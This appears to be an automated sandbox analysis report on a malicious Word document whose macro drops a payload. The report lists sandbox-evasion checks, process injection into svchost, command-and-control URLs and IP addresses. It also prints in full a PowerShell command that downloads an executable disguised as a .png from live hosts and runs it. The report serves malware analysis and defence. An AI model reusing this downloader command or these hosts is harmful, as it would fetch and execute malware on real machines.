Word Doc. Drops Context Aware Payload

VTI Information

VTI Score 100 / 100
VTI Database Version	2.6
VTI Rule Match Count	30
VTI Rule Type	Documents

Detected Threats

	Anti Analysis
	Try to detect application sandbox
	Possibly trying to detect "Sandboxie" by checking for existence of module "SbieDll.dll".
	Possibly trying to detect "Threatexpert" by checking for existence of module "dbghelp.dll".
	Try to detect forensic tool
	Check the existence of DLL "SunBelt Sandbox".
	Check the existence of DLL "Winsock Packet Editor".
	File System
	Handle with malicious files
	File "c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe" is a known malicious file.
	Injection
	Write into memory of another process
	"c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe" modifies memory of "c:\windows\system32\svchost.exe"
	Network
	Download data
	URL "www.events4u.cz/kas23.png".
	URL "myexternalip.com/raw".
	URL "89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/".
	URL "89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/".
	Perform DNS request
	Resolve host name "www.events4u.cz".
	Check external IP address
	Check external IP by asking IP info service at "myexternalip.com/raw".
	Connect to remote host
	Outgoing TCP connection to host "93.185.102.11:80".
	Connect to HTTP server
	URL "89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/".
	URL "89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/".
	URL "myexternalip.com/raw".
	URL "212.38.166.20/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/systeminfo64/".
	URL "www.events4u.cz/kas23.png".
	PE
	Execute dropped PE file
	Execute dropped file "c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe".
	Drop PE file
	Drop file "c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe".
	PE file is packed
	File "c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe" is packed with "Armadillo v1.71".
	File "\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe" is packed with "Armadillo v1.71".
	Process
	Create process
	Create process "cmd /c PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''%TMP%\Mvmubw.exe'');Start-Process ''%TMP%\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" \| Out-File -encoding ASCII -FilePath %TMP%\Mbovxo.bat;Start-Process '%TMP%\Mbovxo.bat' -WindowStyle Hidden"".
	Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
	Create process "C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat".
	Create process "C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe".
	Create process "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe".
	Create process "svchost.exe".
	Read from memory of another process
	"c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe" reads from "svchost.exe".
	Execute encoded PowerShell script
	Execute encoded PowerShell script to possibly hide malicious payload.
	Create system object
	Create mutex with name "Global\.net clr networking".
	Create mutex with name "Global\VLock".
	VBA Macro
	Execute application
	Shell myform1.TextBox2, 0
	Execute macro on specific worksheet event
	Execute macro on "Activate Workbook" event.
-	Browser
-	Device
-	OS
-	Hide Tracks
-	Information Stealing
-	Kernel
-	Masquerade
-	Persistence
-	User
-	YARA